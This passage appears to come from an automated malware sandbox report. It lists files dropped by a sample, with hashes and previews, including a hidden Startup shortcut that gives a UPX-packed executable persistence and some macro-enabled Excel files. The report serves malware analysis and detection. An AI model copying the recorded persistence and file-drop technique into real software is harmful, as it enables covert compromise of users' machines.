SHA-256:	CC4A1B93B6CDC7EDD1AE3AB940B8C0408DDC219039BD3DD1516ECC34B422BBB6
SHA-512:	CD683E6E282A58B3B8961439369E135D4772A77BB7BB6FDC1B33FF363D056DE8BE8FE49A9B4CA4CB42EF942C269F45D16979831847AD727032A3BA7E8135C71C
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9a_DYcleod8WUmyEkLCO6Q">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\JASFhb7.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.259138576404445
Encrypted:	false
SSDEEP:	24:GgsF+0jgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ig+pAZewRDK4mW
MD5:	758A64BB4DD2EEC635EE3E4A0AE5D713
SHA1:	BCEE00EEDF8053779E666D194B1D969C3966D77F
SHA-256:	DBFDC8B589E16AEA7059E3D11C422BA05E752DE7AEB91451F1591CFCDC7ACA9C
SHA-512:	6D0793BBD132286B2092282D5A97B45B4AD3DCB1FD0D00182E2ED398536F005C265BCF012C5DF54D81454D2594173158401E6B2BD2E68A774EAB620447493BF9
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-xtAYsKGdZ2azRmyMAtdYA">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\KIGp1oT.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.269125673200709
Encrypted:	false
SSDEEP:	24:GgsF+0ceISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+cI+pAZewRDK4mW
MD5:	A81BA3ECFE603002807F4C73BDF423B7
SHA1:	6AE14433FD1B4FD25A0165E18311CFCD950646DE
SHA-256:	827A4560668A97F9249C875820A1F13AF514DC5BE9734B158F49DBA143CCC83D
SHA-512:	C0E12CB2511C01D3F55CE8CFF43FA3725A03FE25A68F2EFE7C3BBC1D8E77521DB7B2C0DF3A6F2CA77DD82BEA311D27BB9C1D7274D23A1204C04711C77A09DA49
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qYzlAgK1MGCt7Di34hEi6Q">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\LAaD9pl.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.261604218633468
Encrypted:	false
SSDEEP:	24:GgsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
MD5:	7D37C15DBD807C32D563175C941D32F8
SHA1:	5C7B85C072AF862B6676CE1B905B92D82B596F57
SHA-256:	23F2B561540730EE0E427E728F16B4F6AB16E6D78B820EE93495EDA20584A1A4
SHA-512:	242DEE5813A39102BC80F5FC07855194BB958E37D5190032201B6260129714D5F3F93E6FBC6074580D7E48445DDFB565CAEDC0A4A20597A440968E0D7AC006E8
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="h5LbAnEDopcmK-bkPzHCUA">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\Pcy1YI2.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.253179608450958
Encrypted:	false
SSDEEP:	24:GgsF+0xSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+++pAZewRDK4mW
MD5:	92F2E986EC6EAB2AF84AA5B533DE53B0
SHA1:	8AE5A13B2868F4392AA0731EA2BBB3D5DF48105D
SHA-256:	328B65C754177A1B03673985EAEC63D3CA1C74785501719C044C7A18F0DD0D21
SHA-512:	CE3CAE7BAFAB7257BAD18DD30B9DC93EEEB8F9E3F79C27F9CBB769501629799EE65C47B4B94686D9436A6FA8E205F53EF92B550BD78AEC64FAFBA31B8EE89C01
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="D1NziA0NdorukcTjVviUTg">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\RvPMrMe.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.276342256414453
Encrypted:	false
SSDEEP:	24:GgsF+0VSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+y+pAZewRDK4mW
MD5:	A2AF324B4E0E0FE0929F2DEF058C1A0D
SHA1:	EE26C249F4BF528FB6E0CE8FED5447FC6C6BDCC6
SHA-256:	668C6A67BBB73D3FA87FED9732E60C6948D808D47ADE620504A166FC815AE228
SHA-512:	58FC84B0525152035BABD56B0D5A1903CEE44C4EBE8469168F150F519D99F2E080B65C5430E772C7CA79AF7F2B69D59C48F891838E1AFD5F5C10A9AD1E65ADD8
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HKD3DISLYPs6xISjGtoy4g">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\VDxkG35.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.278774917656553
Encrypted:	false
SSDEEP:	24:GgsF+0NKzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+oKz+pAZewRDK4mW
MD5:	66814EF877F17CFE80B8635E2E8D636E
SHA1:	4516CADD832175C05B91EDA60CADD5253E8DADEE
SHA-256:	593F50627DE0E88D99F5E486239C7CE06421DF9AEA00ADB51FA42DCFF7BBA104
SHA-512:	5871511CD8BA73866C11DBED2A6BB195F28875AF092E8BDE2773325A2D083A67646B58BD3692C1829C52D6F4179ED478947572913ADD13032491B58D5AD5B22B
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rpaQL9DqDE3WJLPJgvZBFA">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\iSe7ovM.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.246667946826094
Encrypted:	false
SSDEEP:	24:GgsF+0v3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+I3+pAZewRDK4mW
MD5:	01E2A795729295F489DCC71A26FAF952
SHA1:	B0D5CCAF013B844184B7E615F164E47026ABD6DA
SHA-256:	86F549CF5190A70B3B1EE5B63CF554BEC13F5ED9D77B22BF420A3D82BAFAF04D
SHA-512:	2AC72BBC1A883A018629312231A473A60A74B377F8A9EB9E68EB2E47BA592AF29F4F78E5369CA32FC400CAA587AE17DF37A0D668D85BF5867D0FBCCD15A8FD1B
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UyKwAt1KQa0FcmA-mprbmw">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\ovVyuok.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.25872609187197
Encrypted:	false
SSDEEP:	24:GgsF+0ESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X+pAZewRDK4mW
MD5:	4891870C1047F870A151E182ED6B6449
SHA1:	5184D3AA993B59D53991FAB952543E70988996D0
SHA-256:	A18FF3688422A408E8A75E1852172B909310AE510744D3F7AB382E87BEEA3878
SHA-512:	A67ECA9E51C97DE72404C7E7351C869A071CEE01544D3398DD17A2D5393902C5EA7BD641925B7FFAAD9FA93A13053B4F4BAD0B042E75AF52A4CC3171B16E1A54
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IEDDgP-ZyqQAeg5IZtinaw">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\rXLgKWZ.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.264473363316389
Encrypted:	false
SSDEEP:	24:GgsF+0BQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
MD5:	193DA91A28E261E8F25906733B6697B8
SHA1:	0AA81BCB1D1AEAF70B241BEB070D71A95EBFA9F1
SHA-256:	5422456C701600398300034F3AFBFBE49EBFAD51C0B44E02DD3DF8B3C8004896
SHA-512:	153930F0E05F6B78F409CBC6C630EFEDEAF19317E1F52149D46C5D2A553E3280A53A0BEE9CD0A1B527A3C9ADBBC65AA471D4C22E986498B768C3395A5461FB39
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4IBY7EqBYGz7iiCrLkmsNw">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\tAZg1wo.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	modified
Size (bytes):	1652
Entropy (8bit):	5.270286253388752
Encrypted:	false
SSDEEP:	24:GgsF+0ASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+v+pAZewRDK4mW
MD5:	EFD503FEA074AF5C06ED0B2893DD417F
SHA1:	0A7BDB9151167AD7556135C930DD7F10C8B03585
SHA-256:	F9D55D7201558F3BDC66A8752E62C698F2D067702B0A3505265F8889B2BC4764
SHA-512:	C9561C2A3A7270B42DD6CD2192C31084190684543FC0ABDCD910F100C45A78A1F2AB1101B60B2F2D6B2910A0695AA0806DB459521220C25E7A4E6FE9104C2E3E
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HGwaq9BMBFW3rzz15gXZKg">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\vLLZ7oOw.xlsm

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	18387
Entropy (8bit):	7.523057953697544
Encrypted:	false
SSDEEP:	384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
MD5:	E566FC53051035E1E6FD0ED1823DE0F9
SHA1:	00BC96C48B98676ECD67E81A6F1D7754E4156044
SHA-256:	8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
SHA-512:	A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
Malicious:	false
Preview:	PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-c.{...dT.m.kL]Yj.\|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

C:\Users\user\AppData\Local\Temp\w3DEHUK.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.271747294380343
Encrypted:	false
SSDEEP:	24:GgsF+0jXWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+QW+pAZewRDK4mW
MD5:	EEBF04024FCE584699822AF025B80E94
SHA1:	C08998FE152D47C6DD8A7A031F33A068F37A3A80
SHA-256:	C2443454C441F99F9D620954581F9605775EE431405080D85FC7BFDA98ADC13E
SHA-512:	60F4ACF5CBE131A38F718086D47AE513A567B2A3E0B38B9F237C1E5F6DCD58AB9C7E5DD02709362A00D384EDB7C47F087959679672B520F273E0756BED2FD48F
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MJsL-YzxpCBZQgCVz0AWtg">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\~$vLLZ7oOw.xlsm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.7769794087092887
Encrypted:	false
SSDEEP:	3:iXKG/4N+RMlW8td:iXlMlW8/
MD5:	37BD8218D560948827D3B948CAFA579C
SHA1:	24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
SHA-256:	189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
SHA-512:	A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
Malicious:	false
Preview:	.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\~DFD7838794DDAF020B.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.746897789531007
Encrypted:	false
SSDEEP:	192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
MD5:	7426F318A20A187D88A6EC88BBB53BAF
SHA1:	4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
SHA-256:	9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
SHA-512:	EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CXNFQD.lnk

Download File

Process:	C:\Users\user\Desktop\._cache_VKKDXE.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:41:16 2024, mtime=Mon Dec 30 09:41:16 2024, atime=Mon Dec 30 09:41:16 2024, length=915968, window=hide
Category:	dropped
Size (bytes):	1817
Entropy (8bit):	3.4485908646333097
Encrypted:	false
SSDEEP:	24:8vT92f9S3er//KtNGAukAoE2+s9T4IlUJJtJtm:8vT92fQ3eHKD9HACr9MIlkJtJt
MD5:	055E9ED5DB2652060B7C088662CBA072
SHA1:	78DB2E37DEA0772A79BB7BA6FD6729264783122E
SHA-256:	8711680E2878AB3E88D118BC6204FFD4FB5A1DC1E2DB7C960EDE5F308575661F
SHA-512:	A3EBE6CB8FA51A76DA4230637A87BF05B6C226D5139A1A39A08C4A0D8643A623DA7BAC558F1C67CF222BC179CB2530D46CA484852D296EE7DD3E1032158088DF
Malicious:	false
Preview:	L..................F.@.. .....nZ.Z..bosZ.Z..bosZ.Z............................:..DG..Yr?.D..U..k0.&...&......Qg._...;.9U.Z.....Z.Z......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y&U..........................3N.A.p.p.D.a.t.a...B.V.1......Y$U..Roaming.@......EW.=.Y$U............................\.R.o.a.m.i.n.g.....V.1......Y(U..Windata.@......Y(U.Y(U....6.......................,.W.i.n.d.a.t.a.....`.2......Y)U .ZTCKPI.exe..F......Y)U.Y)U...........................+ .Z.T.C.K.P.I...e.x.e.......d...............-.......c............5.y.....C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.Z.T.C.K.P.I...e.x.e.-.".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll...................................................................................................

C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe

Download File

Process:	C:\Users\user\Desktop\._cache_VKKDXE.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	915968
Entropy (8bit):	7.8277978314113374
Encrypted:	false
SSDEEP:	12288:jXe9PPlowWX0t6mOQwg1Qd15CcYk0We1Kv4/KuSlziy1WILFZqfGOjg3kT7FmCmV:KhloDX0XOf4f/mlhxQfnmrAL4bHpZl
MD5:	FE8FBB45F71518A33C161E70F6EE1037
SHA1:	613AE22860D3E15053EEA1343B6CA7CD817EE404
SHA-256:	0EE0AA62C8788B17EA2834A427C7A2E6F69B9BD9A8881A72397D35AD162FCE1E
SHA-512:	1F9E0851D292FA65C60609796EC9F43E88B994E096171786805C608D924F65CA37CB655047D0717FA0D7C669E86B871FEF15E68156C4E6A91BF4B3DC0DD6369B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...Dypg.........."......P........... .......0....@.......................................@...@.......@.........................$....0......................(........................................"..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

C:\Users\user\Desktop\._cache_VKKDXE.exe

Download File

Process:	C:\Users\user\Desktop\VKKDXE.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	915968
Entropy (8bit):	7.8277978314113374
Encrypted:	false
SSDEEP:	12288:jXe9PPlowWX0t6mOQwg1Qd15CcYk0We1Kv4/KuSlziy1WILFZqfGOjg3kT7FmCmV:KhloDX0XOf4f/mlhxQfnmrAL4bHpZl
MD5:	FE8FBB45F71518A33C161E70F6EE1037
SHA1:	613AE22860D3E15053EEA1343B6CA7CD817EE404
SHA-256:	0EE0AA62C8788B17EA2834A427C7A2E6F69B9BD9A8881A72397D35AD162FCE1E
SHA-512:	1F9E0851D292FA65C60609796EC9F43E88B994E096171786805C608D924F65CA37CB655047D0717FA0D7C669E86B871FEF15E68156C4E6A91BF4B3DC0DD6369B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...Dypg.........."......P........... .......0....@.......................................@...@.......@.........................$....0......................(........................................"..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

C:\Users\user\Documents\CZQKSDDMWR\UNKRLCVOHV.xlsm

Download File

